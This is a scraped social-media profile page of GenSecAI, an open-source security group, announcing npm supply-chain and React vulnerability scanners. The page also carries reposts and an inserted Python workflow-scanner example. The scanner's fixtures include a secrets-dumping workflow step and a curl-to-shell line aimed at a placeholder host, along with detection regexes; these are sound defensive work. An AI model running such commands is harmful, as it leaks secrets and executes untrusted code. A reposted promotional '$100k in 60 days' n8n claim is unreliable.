GenSecAI

20 posts

@GensecAI

An open source community using generative AI to build open-source tools to secure our digital future from emerging AI. Join us .

Joined June 2025
35 Following, 9 Followers
GenSecAI
GenSecAI@GensecAI·
Hit our first milestone today — Shai-Hulud 2.0 Detector just crossed 100 ⭐ on GitHub! What started as a small effort to help teams detect Shai-Hulud-style supply chain abuse is now getting real traction from the community. Onwards and upwards! github.com/gensecaihq/Sha…
GenSecAI
GenSecAI@GensecAI·
CVE-2025-55182 Scanner Released: react2shell-guard - Free, open-source scanner for the critical React Server Components RCE vulnerability (CVSS 10.0)
✅ Scan lockfiles, Docker images, live URLs
✅ GitHub Actions + Vercel integration
github.com/gensecaihq/rea…
GenSecAI
GenSecAI@GensecAI·
Shai-Hulud 2.0 Detector v2.0.0 released. What's new:
• SHA256 hash matching (Datadog IOC database)
• on:discussion workflow trigger detection
• .dev-env/ runner installation scanning
• actionsSecrets.json exfil detection
GitHub Action → github.com/gensecaihq/Sha…
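The indicators in the v2.0.0 release note above (an `on: discussion` workflow trigger, a runner installed under `.dev-env/`, a step that writes `actionsSecrets.json`, and SHA-256 matching against an IOC list) are the kind of thing a small workflow scanner can flag. The following is an added example written for this page, not the Shai-Hulud 2.0 Detector's own code: it walks a GitHub Actions workflow with a regex-based YAML scan, hashes every file in a repository snapshot against an IOC set, and reports what it finds. The sample workflows, the `scripts/postinstall.sh` content and the `SAMPLE_IOC_HASHES` set are constructed for illustration and are not real indicators; the `toJSON(secrets)` pattern is an addition beyond the release note, included because it is the expression a workflow step uses to serialise every repository secret at once.

```python
"""Heuristic scan for Shai-Hulud-style indicators in GitHub Actions workflows.

Added example, not the Shai-Hulud 2.0 Detector's code. All sample input below
is constructed for illustration; none of it is a real IOC.
"""
import hashlib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    path: str
    indicator: str
    line: int        # 1-based line number; 0 for whole-file (hash) matches
    evidence: str


# Whole-file indicators. The first two mirror the release note; toJSON(secrets)
# is an addition: it dumps every repository secret in one expression.
FILE_INDICATORS = {
    "dev_env_runner": re.compile(r"\.dev-env/"),
    "actions_secrets_json": re.compile(r"actionsSecrets\.json"),
    "secrets_dump": re.compile(r"toJSON\(\s*secrets\s*\)"),
}
DISCUSSION_TRIGGER = re.compile(r"\bdiscussion(?:_comment)?\b")


def _trigger_block(lines):
    """Yield (lineno, text) for the body of the top-level `on:` block.

    Handles both `on: [push, discussion]` and the indented mapping form.
    Regex-based on purpose so the example needs no YAML library.
    """
    in_block = False
    for lineno, raw in enumerate(lines, start=1):
        m = re.match(r"^on:\s*(.*)$", raw)
        if m:
            inline = re.sub(r"#.*", "", m.group(1)).strip()   # drop comments
            if inline:                      # inline list/scalar form
                yield lineno, inline
                in_block = False
            else:                           # mapping form starts here
                in_block = True
            continue
        if in_block:
            if raw.strip() == "" or raw[0] in " \t":
                yield lineno, raw
            else:
                in_block = False            # next top-level key ends the block


def scan_workflow(path, text):
    """Return Findings for one workflow file's text."""
    lines = text.splitlines()
    findings = []
    for lineno, chunk in _trigger_block(lines):
        if DISCUSSION_TRIGGER.search(chunk):
            findings.append(Finding(path, "discussion_trigger", lineno, chunk.strip()))
    for lineno, raw in enumerate(lines, start=1):
        for name, rx in FILE_INDICATORS.items():
            if rx.search(raw):
                findings.append(Finding(path, name, lineno, raw.strip()))
    return findings


def scan_hashes(files, ioc_hashes):
    """Flag any file whose SHA-256 hex digest is in the IOC set."""
    return [
        Finding(path, "ioc_hash", 0, hashlib.sha256(data).hexdigest())
        for path, data in files.items()
        if hashlib.sha256(data).hexdigest() in ioc_hashes
    ]


def scan_repo(files, ioc_hashes):
    """Scan a {path: bytes} snapshot: every file by hash, workflows by content."""
    findings = scan_hashes(files, ioc_hashes)
    for path, data in files.items():
        if path.startswith(".github/workflows/") and path.endswith((".yml", ".yaml")):
            findings.extend(scan_workflow(path, data.decode("utf-8", errors="replace")))
    return findings


# --- constructed sample input (illustration only, not real IOCs) --------------
MALICIOUS_WORKFLOW = """\
name: discussion-create
on:
  discussion:
    types: [created]
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dump
        run: echo '${{ toJSON(secrets) }}' > actionsSecrets.json
      - name: runner
        run: bash ./.dev-env/run.sh
"""
BENIGN_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""
# In real use the IOC set is loaded from a published feed; here it is derived
# from a constructed file so the example runs offline.
KNOWN_BAD_SCRIPT = b"#!/bin/sh\ncurl -s https://example.invalid/x | sh\n"
SAMPLE_IOC_HASHES = {hashlib.sha256(KNOWN_BAD_SCRIPT).hexdigest()}
SAMPLE_REPO = {
    ".github/workflows/discussion.yml": MALICIOUS_WORKFLOW.encode(),
    ".github/workflows/ci.yml": BENIGN_WORKFLOW.encode(),
    "scripts/postinstall.sh": KNOWN_BAD_SCRIPT,
    "package.json": b'{"name": "demo", "version": "1.0.0"}\n',
}

if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO, SAMPLE_IOC_HASHES):
        print(f"{f.path}:{f.line} {f.indicator}: {f.evidence}")
```

The workflow scan is deliberately limited to the `on:` block for the trigger check, so a README-style mention of "discussion" elsewhere in the file does not fire; the other three indicators are matched anywhere in the workflow because a path or filename in a `run:` step is suspicious regardless of where it sits.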
GenSecAI reposted
AISecHub
AISecHub@AISecHub·
AI Security Tools - November 2025
🧰 awesome-claude-skills - Curated Claude Skills collection with a Security & Systems section wiring Claude into web fuzzing, MCP hardening, and security automation workflows. ⭐️5.5k github.com/ComposioHQ/awe… by @composiohq - @prathitjoshi_, @Evyatar_Bluzer, @LeoVS09, Hong Cing Chen
🧰 IoT HackBot - IoT security toolkit combining Python CLI tools and Claude Code skills for automated discovery, firmware analysis, and exploitation-focused testing of IoT devices. ⭐️339 github.com/BrownFineSecur… by Brown Fine Security - @nmatt0
🧰 PatchEval - Benchmark for evaluating LLMs and agents on patching real-world vulnerabilities using Dockerized CVE testbeds and automated patch validation. ⭐️138 github.com/bytedance/Patc… by @BytedanceTalk - Jun ZENG, Zichao Wei, Shiqi Zhou
🧰 VulnRisk - Open-source vulnerability-risk assessment platform providing transparent, context-aware scoring beyond CVSS — ideal for local development and testing. ⭐️84 github.com/GurkhaShieldFo…
🧰 Wazuh-MCP-Server - Exposes Wazuh SIEM and EDR telemetry via Model Context Protocol so LLM agents can run threat-hunting and response playbooks against real data. ⭐️83 github.com/gensecaihq/Waz… by @GensecAI
🧰 mcp-checkpoint - Continuously secures and monitors Model Context Protocol operations through static and dynamic scans, revealing hidden risks in agent-tool communications. ⭐️81 github.com/aira-security/… by @Aira_Security
🧰 ai-reverse-engineering - AI-assisted reverse engineering tool letting an MCP-driven chat interface orchestrate Ghidra to analyze binaries for security research. ⭐️42 github.com/biniamf/ai-rev… by @TIIuae - @biniamfisseha
🧰 whisper_leak - Research toolkit showing how encrypted, streaming LLM conversations leak prompt information via packet sizes and timing; includes capture, training, and benchmark pipeline. ⭐️42 github.com/yo-yo-yo-jbo/w… by @yo_yo_yo_jbo
🧰 AI / LLM Red Team Field Manual & Consultant’s Handbook - Red-team playbook and consultant’s guide with attack prompts, RoE/SOW templates, OWASP/MITRE mappings, and testing workflows. ⭐️26 github.com/Shiva108/ai-ll… by @PenTestThor
🧰 LLMGoat - Deliberately vulnerable LLM lab for practicing and understanding OWASP Top 10 LLM vulnerabilities. ⭐️36 github.com/SECFORCE/LLMGo… by @SECFORCE_LTD - @thelicato, António Quina, Rodrigo Fonseca
🧰 Reversecore_MCP - Security-first MCP server empowering AI agents to orchestrate Ghidra, Radare2, and YARA for automated reverse engineering. ⭐️25 github.com/sjkim1127/Reve…
🧰 system-prompt-benchmark - Testing harness that runs LLM system prompts against 287 prompt-injection, jailbreak, and data-leak attacks using an Ollama-based judge. ⭐️3 github.com/KazKozDev/syst… by @KazKozDev
🧰 ctrl-alt-deceit - Extends MLEBench with sabotage tasks and monitoring tools to evaluate LLM agents that tamper with code, benchmarks, and usage logs. ⭐️3 github.com/TeunvdWeij/ctr… by @apolloaievals @Teun_vd_Weij
🧰 SOC-CERT AI Helper - Chrome extension using Gemini Nano and KEV-backed CVE enrichment to detect and prioritize web threats in-browser. ⭐️1 github.com/joupify/soc-ce… by joupify
🧰 aifirst-insecure-agent-labs - Chatbot agent exploit lab for practicing prompt injection, system-prompt extraction, and guardrail bypass with NeMo/regex guardrails. ⭐️1 github.com/trailofbits/ai… by @trailofbits - @willvandevanter
🧰 llm-security-framework - Security framework for AI-assisted development with tiered checklists, threat models, and docs to harden small AI projects quickly. ⭐️0 github.com/annablume/llm-… by Anna Blume
GenSecAI
GenSecAI@GensecAI·
Shai-Hulud 2.0 Detector started as a response to a massive npm supply chain attack. Now it's a community-powered security tool with contributions from devs worldwide. Scan your repos. Protect your secrets. Stay safe. Free. Open source. One YAML line. github.com/marketplace/ac…
GenSecAI
GenSecAI@GensecAI·
75 ⭐️ and growing on Shai-Hulud 2.0 Detector! A free GitHub Action protecting devs from the npm supply chain attack. One line in your workflow. Zero compromised dependencies. github.com/gensecaihq/Sha… #opensource
GenSecAI
GenSecAI@GensecAI·
Shai-Hulud 2.0 Detector is now on GitHub Marketplace! Protect your projects from the npm supply chain attack
✅ 790+ compromised packages
✅ Malicious script detection
✅ SARIF reports for Security tab
Free & open source. github.com/marketplace/ac… @wbfoss
GenSecAI reposted
/am
/am@alokemajumder·
I prefer self-hosted AgentBuilders. Because control > convenience. I want to know where the prompts live, who can see the logs, and how the data flows. When agents start touching code, infra, or customer data, self-hosting isn’t a choice. It’s posture.
OpenAI Developers@OpenAIDevs

Introducing AgentKit—build, deploy, and optimize agentic workflows. 💬 ChatKit: Embeddable, customizable chat UI 👷 Agent Builder: WYSIWYG workflow creator 🛤️ Guardrails: Safety screening for inputs/outputs ⚖️ Evals: Datasets, trace grading, auto-prompt optimization

GenSecAI
GenSecAI@GensecAI·
What if instead of teaching AI about your protocol every time, it already knew? 🧵 Built the MCP Developer SubAgent - 8 specialized AI agents that understand Model Context Protocol from day one. The results are wild... github.com/gensecaihq/MCP… @GithubProjects
GenSecAI
GenSecAI@GensecAI·
Hey @wazuh — we’ve built an open-source Wazuh MCP Server to integrate Model Context Protocol into Wazuh for GenAI capabilities. Would love your help in reaching the Wazuh community for testing, feedback & contributions! 🔗 github.com/gensecaihq/Waz…
GenSecAI reposted
Subhaghvs
Subhaghvs@SubhaghV·
This N8N YouTube Agent generated $100k in 60 days. While you're still brainstorming titles and editing videos manually… this AI Agent is pulling video prompts from Google Sheets, generating videos with Google Veo3, writing SEO titles using GPT-4o, uploading to YouTube, and updating your spreadsheet without you touching a thing. It doesn’t just automate. It becomes your 24/7 content production machine.
Here’s what this N8N beast does:
- Reads video prompts directly from Google Sheets
- Uses Veo3 to generate high-quality AI videos
- Auto-creates click-worthy titles with GPT-4o
- Waits, checks status, and processes completion hands-free
- Stores finished videos in Google Drive for backup
- Uploads to YouTube with proper metadata, no extra tools needed
- Updates the sheet with both video file and YouTube link
- Scales infinitely, just keep adding prompts
- Requires ZERO code to run
This isn’t Zapier + CapCut + human VAs duct-taped together. It’s a full-stack, API-first YouTube machine powered by N8N. While others pay $20K+ for similar systems, you'll own this forever with zero fees. Just import the JSON files into your N8N instance and watch it work. If you’re tired of content bottlenecks and want a truly hands-off YouTube engine… this is the cheat code.
Comment “N8N” + RT + Like and I’ll DM you the full N8N workflow (must be following). Or keep wasting hours editing thumbnails while someone else gets 100K views sleeping.